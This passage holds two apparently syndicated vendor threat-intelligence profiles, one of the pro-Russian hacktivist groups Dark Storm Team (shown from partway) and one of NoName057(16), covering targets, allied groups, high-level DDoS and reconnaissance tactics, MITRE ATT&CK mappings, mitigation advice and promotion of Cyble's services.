Although the group’s ideological stance is rooted in support for Russia, its targeting footprint extends far beyond regional boundaries. Reported activity includes campaigns directed at organizations in the United Arab Emirates, Egypt, France, Israel, Italy, the Netherlands, Thailand, Ukraine, and the United States.  

This broad geographic reach reflects a willingness to strike entities perceived as politically relevant, regardless of location. Industries affected by Dark Storm Team's operations note a preference for sectors where service disruption would have immediate public visibility. The group’s targets span: 

• Banking, Financial Services, and Insurance (BFSI) 

• Energy and Utilities 

• Government and Law Enforcement 

• Healthcare 

• Media and Entertainment 

• Transportation and Logistics 

Affiliated and Related Hacktivist Groups 

Dark Storm Team maintains links with multiple threat groups whose motivations, tactics, or alliances overlap with its own. These associations strengthen its operational resilience and expand its access to shared tooling and infrastructure. 

• AlixSec: AlixSec is an Indonesia-leaning, pro-Palestinian hacktivist group known for routine DDoS attacks against government institutions and private organizations. The group has also partnered with groups such as BhinnekaSec and AnonymousWorld to carry out attacks against Indian websites. 

• Mr. Hamza: Originating from Morocco, Mr. Hamza is a hacktivist threat actor conducting ideologically driven DDoS operations. Its activity frequently targets national security institutions, including intelligence and law enforcement agencies. 

• OverFlame: OverFlame is firmly situated within the pro-Russian hacktivist environment. Its operations primarily target Ukraine and allied nations, and it collaborates with well-known collectives such as NoName057(16) and the People’s Cyber Army. 

• Server Killers: Another pro-Russian group, Server Killers, is associated with persistent DDoS operations against organizations considered hostile to Russian state interests. 

• Team BD Cyber Ninja: This Bangladesh-based group conducts cyber defacement and targeting campaigns focused largely on educational and government institutions in Bangladesh and India. 

• Z-Pentest: First observed in late 2024, Z-Pentest is one of the newer collectives linked to NoName057(16) and the People’s Cyber Army. The group has demonstrated intent to compromise Industrial Control System (ICS) panels and deface websites.  

Role in Multi-Group Campaigns

The Dark Storm Team played an important role in carrying out cyberattacks that followed the Iran–Israel conflict in June 2025. Numerous hacktivist groups, including GhostSec, Arabian Ghosts, and Mr. Hamza, coordinated attacks across more than 18 critical infrastructure sectors in Israel. These operations included DDoS attacks, ICS intrusions, and data exfiltration. Dark Storm Team contributed by targeting Israeli government services, while other actors deployed tooling such as GhostLocker, GhostStealer, and IOControl. 

Tactics and Techniques 

Dark Storm Team operates in ways that are consistent with many other pro-Russian hacktivist groups. One of its common methods involves breaking into systems that are exposed to the internet. The group looks for weaknesses, such as outdated software or incorrect settings, in places like websites, online platforms, cloud services, or network equipment. When these weaknesses are found, they can be used as entry points into deeper parts of an organization’s environment. 

Another tactic involves overwhelming online services with excessive traffic to knock them offline. This approach targets websites, email systems, and other public-facing services by flooding them with more data than they can handle. To make the attacks more effective and harder to block, the group often sends the traffic from many different sources or disguises where it is coming from. 

In addition to attacking networks, Dark Storm Team may also shut down individual devices by overloading their resources. This can cause systems to freeze, crash, or become too slow to function normally, even when the wider network remains intact. 

Before carrying out any of these operations, the group usually gathers details about its targets. This can include information about users, login methods, or how systems are configured. They collect this data by scanning online services, tricking individuals into revealing information, or placing harmful code on compromised websites. This preparation allows their attacks to be more precise and effective. 

Conclusion 

Dark Storm Team exists as an active and coordinated hacktivist threat, leveraging broad alliances and sustained disruption tactics to target critical sectors worldwide. Its methods and participation in multi-group campaigns require timely and high-quality intelligence. 

Fortunately, Cyble’s threat intelligence platform delivers this level of foresight, offering real-time awareness and AI-driven analysis that support faster and more informed defensive decisions. In an environment shaped by rapid escalation and unpredictable factors, timely intelligence is the most reliable path to proactive security. 

Start with a free External Threat Assessment to reveal the risks hidden across your attack surface. Follow it with a personized Cyble demo to see how AI-native intelligence detects, predicts, and neutralizes threats like Dark Storm Team in real time. 

Recommendation and Mitigation Strategies 

• Deploy DDoS protection and redundant infrastructure to maintain service availability. 

• Keep public-facing systems and applications patched and secure. 

• Harden endpoints to prevent crashes and resource exhaustion. 

• Monitor threats using intelligence platforms like Cyble for early detection. 

• Train staff to recognize phishing and social engineering attempts. 

• Secure critical infrastructure, including transport and ICS systems. 

• Maintain an incident response plan for rapid containment and recovery. 

MITRE ATT&CK Techniques Associated with Dark Storm Team 

• Exploit Public-Facing Application (T1190): Adversaries exploit weaknesses in internet‑facing systems, such as websites, databases, cloud platforms, or network devices, to gain initial access, often leveraging bugs, misconfigurations, or outdated components. Compromise may extend to underlying cloud or container environments and edge infrastructure. 

• Network Denial of Service (T1498): Attackers overwhelm network bandwidth to disrupt access to websites, DNS, email, and other online services. These attacks may come from single or distributed sources, often using IP spoofing or botnets to increase volume and evade filtering. 

• Endpoint Denial of Service (T1499): Adversaries exhaust system resources or cause crashes on specific hosts without saturating network capacity. They target operating systems, server software, and application layers, frequently using botnets or traffic manipulation techniques. 

• Gather Victim Identity Information (T1589): Attackers collect user identities, credentials, and authentication details through phishing, system probing, or publicly available sources to support targeted attacks or enable unauthorized access. 

• Gather Victim Host Information (T1592): Adversaries obtain details about system configurations, network setups, and host attributes through scanning, phishing, or embedded malicious content, supporting further reconnaissance and preparation for intrusion. 

The post Threat Actor Profile: Dark Storm Team appeared first on Cyble.

NoName057(16), also referenced as 05716nnm, Nnm05716, NoName057, and NoName05716, is a pro-Russian hacktivist group that emerged in early 2022. The group quickly became known for coordinating large-scale Distributed Denial of Service (DDoS) operations against governments, critical infrastructure, and private-sector organizations in countries viewed as opposing Russian geopolitical interests. Its activity is ideologically motivated rather than financially driven, and its operations often coincide with political developments related to Russia’s war against Ukraine. 

Since its first observed campaigns, NoName057(16) has used Telegram as its primary communication channel, providing updates on targets, circulating propaganda, and mobilizing volunteers who participate in coordinated attacks. The group also relies on its custom DDoS toolkit, DDOSIA, which streamlines the execution of high-volume traffic floods. Through these combined methods, NoName057 has positioned itself as one of the more persistent hacktivist collectives operating within the wider pro-Russian ecosystem. 

By mid-2025, intelligence reporting suggested that some former members of the People's Cyber Army, an entity historically associated with APT44, had aligned themselves with NoName057(16). If accurate, this shift likely enhanced the group’s operational maturity, strengthening its ability to conduct attacks that extend beyond basic hacktivism. 

Geographic and Industry Targeting 

Although the group’s ideological focus remains centered on Ukraine, NoName057 campaigns have reached far beyond the region. Targets have been recorded across Europe, North America, and parts of Asia. Countries repeatedly affected include Canada, the Czech Republic, Germany, Denmark, Estonia, Spain, France, the United Kingdom, Israel, Italy, South Korea, Lithuania, Latvia, Moldova, Norway, Poland, Turkey, Taiwan, Ukraine, and the United States. 

Sector-specific targeting by NoName057 spans a wide variety of industries. The group has directed attention toward agriculture, banking and financial services, consumer goods, energy and utilities, government agencies, law enforcement, hospitality, manufacturing, telecommunications, retail, transportation, and logistics.  

This pattern aligns with the behavior of ideologically motivated actors seeking to create public disruption and generate media attention rather than stealing data or achieving persistence within affected networks. 

Tooling and Related Groups

NoName057 campaigns frequently incorporate tools and infrastructure provided by the associated group known as Dosia. While Dosia is sometimes considered a separate entity, its capabilities are frequently leveraged by threat actors aligned with pro-Russian causes, including NoName057. Dosia’s activities center on social engineering and DDoS operations, and it has been linked to infrastructure initially tied to the obscure hosting provider Stark Industries Solutions. 

Dosia’s ongoing development of DDoS utilities, reported to be increasingly compatible with diverse processor architectures and operating systems, suggests an effort to make its tools more accessible to a distributed volunteer base. Threat actors using Dosia-linked resources often rely on deception tactics to trick users into exposing sensitive information or unknowingly assisting malicious operations.  

Tactics and Techniques 

NoName057 typically begins its operations by taking advantage of weaknesses in systems that are accessible online, using flaws or outdated components to gain a foothold and sometimes hiding its activity once inside.  

Their primary method of disruption involves overwhelming networks with excessive traffic to knock out websites, email platforms, and other online services offline, often as a way to send a political message or support a broader narrative. They also carry out attacks that directly overload or destabilize individual devices, causing them to crash or become unresponsive without flooding the entire network.  

Before launching these actions, NoName057 gathers information about potential targets, such as user details or system characteristics, sometimes by probing online services or planting malicious content on compromised sites, allowing them to tailor and strengthen their attacks. 

Recent Disruption: Operation Eastwood 

Between 14 and 17 July 2025, Europol and Eurojust coordinated Operation Eastwood, a major effort to suppress the infrastructure supporting NoName057(16). Law enforcement agencies across more than a dozen countries dismantled over 100 servers linked to the group, disrupting command channels and taking core systems offline. Investigators issued seven arrest warrants and conducted numerous searches and interviews targeting suspected collaborators. 

Authorities also contacted more than 1,000 individuals believed to have supported the group’s campaigns, informing them of potential legal consequences. Prior investigations had shown that NoName057 frequently relied on crowdsourced participation, sometimes offering small cryptocurrency rewards to encourage involvement. 

Conclusion 

As of 2025, NoName057(16) continues to operate as a highly active pro-Russian hacktivist collective, targeting governments and organizations that oppose Russia’s strategic interests. Its volunteer-driven ecosystem, coordination with groups like Dosia, and continuous adaptation of attack techniques allow it to remain effective despite recent law-enforcement disruptions. 

 To counter fast-moving threats like this, Cyble’s External Threat Profile Report offers organizations a clear view of vulnerabilities, misconfigurations, data leaks, and dark-web exposure.  

Get a free External Threat Assessment to understand your exposure and take corrective action. Or schedule a personalized demo to see how Cyble can protect your organization against NoName057(16) and other threat actors today! 

Recommendation and Mitigation Strategies 

• DDoS Protection: Deploy traffic filtering, rate limiting, and redundant infrastructure to withstand high-volume attacks. 

• Secure Public-Facing Systems: Regularly patch web servers, databases, and network devices to prevent exploitation. 

• Endpoint Hardening: Monitor system resources, apply updates, and use endpoint detection to prevent crashes or service disruptions. 

• Staff Awareness: Train employees against social engineering and phishing campaigns commonly used by NoName057 and Dosia. 

• Threat Intelligence & Monitoring: Use continuous monitoring and tools like Cyble’s External Threat Profile Report to detect vulnerabilities, exposed data, and suspicious activity. 

MITRE ATT&CK Techniques Associated with the NoName057(16) 

• Exploit Public-Facing Application (T1190): Adversaries target internet-facing systems, including websites, databases, network devices, and cloud/container infrastructure, exploiting software bugs, misconfigurations, or outdated components to gain initial access. 

• Network Denial of Service (T1498): Attackers overwhelm network bandwidth to disrupt websites, email, DNS, or web services, using single or distributed sources, often leveraging IP spoofing or botnets. 

• Endpoint Denial of Service (T1499): Adversaries exhaust system resources or crash services on target devices without saturating the network, targeting OS, server apps, and application layers, sometimes using botnets or traffic manipulation. 

• Gather Victim Identity Information (T1589): Attackers collect personal data, credentials, and user details via phishing, system probing, or publicly available sources to support further attacks. 

• Gather Victim Host Information (T1592): Adversaries gather configuration and administrative details of target systems through scanning, phishing, or embedding malicious content, aiding in reconnaissance and operational setup. 

The post Threat Actor Profile: NoName057(16) appeared first on Cyble.